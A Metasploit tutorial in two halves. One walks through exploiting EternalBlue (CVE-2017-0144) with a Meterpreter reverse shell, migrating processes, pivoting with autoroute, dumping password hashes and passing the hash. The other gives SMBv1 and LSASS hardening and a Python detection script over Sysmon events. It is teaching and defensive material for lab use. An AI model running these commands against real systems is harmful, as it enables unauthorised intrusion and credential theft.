Introduction / Overview
The Metasploit Framework is the most widely used exploitation framework in the industry, and for good reason: it standardizes the entire offensive workflow — reconnaissance, exploitation, payload delivery, and post-exploitation — behind a single, scriptable console. If you can drive msfconsole, you can chain together thousands of exploit, auxiliary, and post modules without writing a line of code.
This article walks through the core concepts every operator needs: navigating msfconsole, using search to find modules, configuring and launching an exploit, working inside a meterpreter session, and running post modules for privilege escalation and collection. We close with a Blue Team section, because everything Metasploit does leaves artifacts — and knowing them is what separates a defender from a victim.
Legal and ethical disclaimer. This material is for education and authorized security testing only. Run these commands exclusively against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is a crime under laws such as the U.S. CFAA, the UK Computer Misuse Act, and equivalents worldwide. You are responsible for your own actions.
How It Works / Background
Metasploit is organized into module categories that map directly to phases of an engagement:
- exploits — code that triggers a vulnerability to gain a foothold.
- payloads — what runs on the target after the exploit lands (a shell, Meterpreter, etc.).
- auxiliary — scanners, fuzzers, and non-exploit tooling (no payload).
- post — modules that run after you have a session (loot, pivot, escalate).
- encoders / nops / evasion — payload shaping and AV evasion helpers.
Payloads come in two flavors. Staged payloads (e.g. windows/x64/meterpreter/reverse_tcp) send a tiny first-stage stub that pulls the rest over the network; stageless payloads (e.g. windows/x64/meterpreter_reverse_tcp, note the underscore) ship the whole thing at once. Staged payloads are smaller on the wire but noisier in terms of follow-up connections.
Meterpreter is Metasploit's flagship payload: an in-memory, DLL-injection-based agent that communicates over an encrypted, extensible channel. Because it lives in the memory of a host process and rarely touches disk, it defeats naive file-based detection — but it is far from invisible, as we'll see.
Prerequisites / Lab Setup
Use an isolated lab. A typical setup:
- Attacker: Kali Linux with Metasploit preinstalled.
- Target: an intentionally vulnerable VM such as Metasploitable 2/3, or a Windows host you control.
Initialize the database (gives you hosts, services, and loot tracking) and launch the console:
# Initialize the PostgreSQL-backed Metasploit database
sudo msfdb init
# Launch the console
msfconsole -q
# Inside msfconsole, confirm DB connectivity
db_status
workspace -a lab01 # create and switch to a clean workspace
Attack Walkthrough / PoC
1. Recon and importing results
Run a Nmap scan straight into the database so hosts and services are tracked automatically:
# From inside msfconsole
db_nmap -sV -sC 10.10.10.5
hosts
services
2. Searching for modules
The search command is your map. It supports keyword filters that make a huge module set tractable:
# Free-text
search eternalblue
# Filter by CVE, type, platform, and rank
search cve:2017-0144 type:exploit platform:windows
search type:auxiliary name:smb_version
# Sort by reliability/impact
search rank:excellent type:exploit name:smb
Results are numbered, so you can select a module directly with use 0 instead of typing the full path. To inspect a module before committing to it:
use exploit/windows/smb/ms17_010_eternalblue
info
show options
show targets
show payloads
3. Configuring and launching an exploit
show options lists the required (yes) and optional settings. Set them with set, and use setg to persist a value globally across modules (handy for LHOST):
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
setg LHOST 10.10.14.7
set LPORT 4444
# Validate that the target is actually vulnerable first
check
# Fire it (use 'exploit -j' to run the handler as a background job)
exploit
EternalBlue exploits CVE-2017-0144, the SMBv1 flaw patched in Microsoft bulletin MS17-010. A successful run drops you into a Meterpreter session.
4. Driving Meterpreter
# Who am I and where am I?
getuid
sysinfo
getpid
# Filesystem and search
pwd
ls
search -f *.kdbx
# Network and pivoting
ipconfig
run autoroute -s 10.10.20.0/24 # route traffic to a second subnet through this host
# Move into a stable, long-lived process (note: this is detectable)
ps
migrate -N explorer.exe
# Drop to a system shell, or back to Meterpreter
shell
exit
To background a session and return to the console, press Ctrl+Z. Manage sessions with sessions -l, and re-enter one with sessions -i 1.
5. Privilege escalation and post modules
post modules act on an existing session. Reference the session with SESSION:
# Background the Meterpreter session first (Ctrl+Z)
# Suggest local privesc exploits based on the host
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Harvest hashes (requires SYSTEM privileges)
use post/windows/gather/hashdump
set SESSION 1
run
# Enumerate installed software, useful for further targeting
use post/windows/gather/enum_applications
set SESSION 1
run
From a Meterpreter prompt you can also run many of these inline, e.g. run post/windows/gather/checkvm or hashdump. Once you have credentials or hashes, pass them to lateral-movement modules such as exploit/windows/smb/psexec with SMBPass set to an NTLM hash for a pass-the-hash attack; see Pass-the-Hash explained for the underlying protocol details.
Mermaid Diagram

Diagram: the Metasploit kill chain — recon feeds module selection, a validated exploit yields an in-memory Meterpreter session, which is then escalated and mined by post modules before pivoting deeper.
Detection & Defense (Blue Team)
Metasploit is loud if you know what to listen for. Detection and mitigation deserve at least as much attention as the offense.
Patch and reduce attack surface. EternalBlue (MS17-010) has been patched since March 2017. Disable SMBv1 entirely — it has no legitimate modern use:
# Disable the SMBv1 protocol (Windows 8.1 / Server 2012 R2+)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
# Verify SMBv1 is off on the server side
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
Detect the exploit on the wire. EternalBlue's grooming produces anomalous SMB transactions. Emerging Threats and the community Suricata/Snort rulesets ship signatures for it (e.g. ET EXPLOIT Possible ETERNALBLUE ...). Watch for SMB tree connects to the IPC$ share followed by malformed Trans2 requests.
Detect Meterpreter behavior, not just files. Because Meterpreter is in-memory, focus on behavioral telemetry:
- Process injection / migration. migrate triggers OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread against a target process. Map this to MITRE ATT&CK T1055 (Process Injection). Sysmon Event ID 8 (CreateRemoteThread) and EID 10 (ProcessAccess) with suspicious granted-access masks (e.g. 0x1F0FFF) are high-fidelity here.
- Suspicious parent-child chains. A service or spoolsv.exe spawning cmd.exe/powershell.exe (from shell or from getsystem's named-pipe impersonation) is anomalous. getsystem notably creates a named pipe; named-pipe impersonation maps to T1134.
- Default network signatures. Stock Meterpreter handlers, default certificates, and the default callback port 4444 are well-known IOCs. Alert on outbound connections to uncommon high ports from server processes.
- Credential access. hashdump/smart_hashdump read from the SAM/SECURITY hives or LSASS; map this to T1003 (OS Credential Dumping). Enable LSASS protection (RunAsPPL) and Credential Guard, and monitor handle requests to lsass.exe.
# Enable LSA protection (RunAsPPL) to harden against credential dumping
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
Hunt query idea. In your EDR/SIEM, alert on any non-lsass process opening a handle to lsass.exe with PROCESS_VM_READ, and on CreateRemoteThread where source and target image paths differ across a privilege boundary. Pair this with the network IOCs above for high-confidence Meterpreter detection. For broader Windows hardening, see Windows logging and Sysmon for blue teams.
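The hunt logic above, written out as an added example (not code from the original article): a small rule pass over Sysmon-style EID 3/8/10 records that flags the Meterpreter behaviours listed in this section. The field names follow Sysmon's layout; the event records, the image paths and the simplification of "privilege boundary" to "different source and target image" are assumptions made for illustration.

```python
# Added example, not from the original article: a small hunt over Sysmon-style
# events for the Meterpreter behaviours discussed above. Field names follow
# Sysmon's EID 3/8/10 layout; the records themselves are constructed samples.
PROCESS_VM_READ = 0x0010        # access right needed to read LSASS memory
FULL_ACCESS_MASK = 0x1F0FFF     # PROCESS_ALL_ACCESS, the mask typical of migrate
DEFAULT_HANDLER_PORTS = {4444}  # stock Metasploit callback port

SAMPLE_EVENTS = [  # constructed records: (EventID, fields)
    (10, {"SourceImage": r"C:\Windows\Temp\svc.exe",
          "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"}),
    (10, {"SourceImage": r"C:\Windows\System32\svchost.exe",
          "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"}),
    (10, {"SourceImage": r"C:\Windows\Temp\svc.exe",
          "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F0FFF"}),
    (8, {"SourceImage": r"C:\Windows\Temp\svc.exe",
         "TargetImage": r"C:\Windows\explorer.exe"}),
    (8, {"SourceImage": r"C:\Windows\explorer.exe",
         "TargetImage": r"C:\Windows\explorer.exe"}),
    (3, {"Image": r"C:\Windows\System32\spoolsv.exe", "Initiated": "true",
         "DestinationPort": "4444"}),
    (3, {"Image": r"C:\Program Files\Browser\browser.exe", "Initiated": "true",
         "DestinationPort": "443"}),
]

def _name(path):
    """Lower-cased image file name, so directory differences do not matter."""
    return path.rsplit("\\", 1)[-1].lower()

def hunt(events):
    """Return (event_index, rule, ATT&CK id) for every record that matches a rule."""
    hits = []
    for i, (eid, f) in enumerate(events):
        if eid == 10:  # ProcessAccess: handle opened on another process
            access = int(f["GrantedAccess"], 16)
            cross = _name(f["SourceImage"]) != _name(f["TargetImage"])
            if cross and _name(f["TargetImage"]) == "lsass.exe" and access & PROCESS_VM_READ:
                hits.append((i, "lsass_vm_read", "T1003"))
            elif cross and access == FULL_ACCESS_MASK:
                hits.append((i, "full_access_handle", "T1055"))
        elif eid == 8:  # CreateRemoteThread into a different image
            if _name(f["SourceImage"]) != _name(f["TargetImage"]):
                hits.append((i, "cross_process_thread", "T1055"))
        elif eid == 3:  # NetworkConnect: outbound to a stock handler port
            if f["Initiated"] == "true" and int(f["DestinationPort"]) in DEFAULT_HANDLER_PORTS:
                hits.append((i, "default_handler_port", "metasploit_ioc"))
    return hits
```

Run hunt(SAMPLE_EVENTS) to see which constructed records trip which rule; in a real pipeline the same function would be fed parsed Sysmon events from the SIEM.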
Conclusion
Metasploit lowers the barrier to exploitation by giving you a consistent grammar — search, use, set, check, exploit — and a powerful post-exploitation agent in Meterpreter. Mastering the workflow on legitimate targets makes you a faster, more methodical operator. But the same predictability that makes Metasploit easy to use also makes it detectable: default ports, injection patterns, and credential-access behaviors are all signatures a prepared defender will catch. Learn both sides, and patch the things that let EternalBlue work in the first place.
References
- MITRE ATT&CK — Process Injection (T1055): https://attack.mitre.org/techniques/T1055/
- MITRE ATT&CK — OS Credential Dumping (T1003): https://attack.mitre.org/techniques/T1003/
- Microsoft Security Bulletin MS17-010: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
- NVD — CVE-2017-0144: https://nvd.nist.gov/vuln/detail/CVE-2017-0144
- Rapid7 Metasploit Documentation: https://docs.metasploit.com/
- HackTricks — Metasploit / Meterpreter: https://book.hacktricks.xyz/
- Offensive Security — Metasploit Unleashed: https://www.offsec.com/metasploit-unleashed/